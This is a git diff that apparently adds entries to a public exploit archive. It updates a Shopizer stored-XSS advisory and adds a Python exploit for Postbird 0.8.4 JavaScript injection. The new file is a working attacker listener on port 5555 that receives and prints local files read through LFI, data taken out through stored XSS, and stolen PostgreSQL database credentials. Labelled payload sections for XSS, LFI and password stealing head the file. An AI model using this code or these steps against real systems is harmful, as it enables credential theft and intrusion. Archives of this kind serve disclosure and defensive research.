diff --git a/exploits/java/webapps/49901.txt b/exploits/java/webapps/49901.txt
index f161231f4..38d1f11b1 100644
--- a/exploits/java/webapps/49901.txt
+++ b/exploits/java/webapps/49901.txt
@@ -4,6 +4,7 @@
# Vendor Homepage: https://www.shopizer.com
# Software Link: https://github.com/shopizer-ecommerce/shopizer
# Version: <= 2.16.0
+# CVE: CVE-2021-33561, CVE-2021-33562
Stored XSS - 'customer_name' Administration
@@ -16,6 +17,7 @@ Steps to reproduce:
3. Change customer name to and save it
4. Open "Customers" -> XSS payload will trigger
+Except "Customers" section, XSS will be executed in "Orders" (/admin/orders/list.html) and "Recent orders" (/admin/home.html)
Reflected XSS - 'ref' parameter
diff --git a/exploits/multiple/webapps/49910.py b/exploits/multiple/webapps/49910.py
new file mode 100755
index 000000000..20d43acee
--- /dev/null
+++ b/exploits/multiple/webapps/49910.py
@@ -0,0 +1,88 @@
+# Exploit Title: Postbird 0.8.4 - Javascript Injection
+# Date: [26 May 2021]
+# Exploit Author: Debshubra Chakraborty
+# Vendor Homepage: https://github.com/paxa/postbird
+# Software Link: https://www.electronjs.org/apps/postbird
+# Version: 0.8.4
+# Tested on: Linux
+# CVE : CVE-2021-33570
+
+"""
+XSS Payload
+![]()
+
+LFI Payload
+![]()
+
+PostgreSQL Password Stealing Payload
+![]()
+
+"""
+
+from http.server import BaseHTTPRequestHandler, HTTPServer
+import urllib.parse
+import re
+
+hostName = '0.0.0.0'
+serverPort = 5555
+
+class MyServer(BaseHTTPRequestHandler):
+ def do_GET(self):
+ self.send_response(200)
+ parse(urllib.parse.unquote(self.requestline))
+
+ def log_message(self, format, *args):
+ return
+
+
+def parse(data):
+ expression = re.search('\S+=', data)
+ attr = expression.group()
+
+ if attr[2:len(attr)-1] == 'file':
+ data = data[12:len(data)-11]
+ data = data.rsplit('\\n')
+ print(f'\n[+] File received from LFI: \n\n')
+ for output in data:
+ print(output)
+
+ elif attr[2:len(attr)-1] == 'xss':
+ data = data[11:len(data)-10]
+ print(f'\n[+] Data exfiltration from Stored XSS: \n\n{data}')
+
+ elif attr[2:len(attr)-1] == 'credentials':
+ pos = re.search('{"\S+:', data)
+ data = data[pos.start():len(data)-11]
+ for i in range(2, len(data), 1):
+ if data[i] == '"':
+ pos = i
+ break
+
+ host = data[2:pos]
+ data = data[14:]
+ data = data.rsplit(',')
+ print(f'\n\n[+] The Database credentials received\n\nHost = {host}')
+ for output in data:
+ print(output)
+
+ else:
+ print(f'\n\n[-] Unknown header attribute found, atribute = {attr[2:len(attr)-1]}')
+
+
+def main():
+ global hostName, serverPort
+ webServer = HTTPServer((hostName, serverPort), MyServer)
+ print("Server started http://%s:%s" % (hostName, serverPort))
+
+ try:
+ webServer.serve_forever()
+
+ except KeyboardInterrupt:
+ pass
+
+ webServer.server_close()
+ print("\nServer stopped.")
+
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index d2efa3b60..b5c6ea524 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -44073,3 +44073,4 @@ id,file,description,date,author,type,platform,port
49905,exploits/php/webapps/49905.txt,"WordPress Plugin Cookie Law Bar 1.2.1 - 'clb_bar_msg' Stored Cross-Site Scripting (XSS)",2021-05-25,"Mesut Cetin",webapps,php,
49907,exploits/multiple/webapps/49907.py,"Codiad 2.8.4 - Remote Code Execution (Authenticated) (3)",2021-05-26,"Ron Jost",webapps,multiple,
49909,exploits/php/webapps/49909.py,"Pluck CMS 4.7.13 - File Upload Remote Code Execution (Authenticated)",2021-05-26,"Ron Jost",webapps,php,
+49910,exploits/multiple/webapps/49910.py,"Postbird 0.8.4 - Javascript Injection",2021-05-27,"Debshubra Chakraborty",webapps,multiple,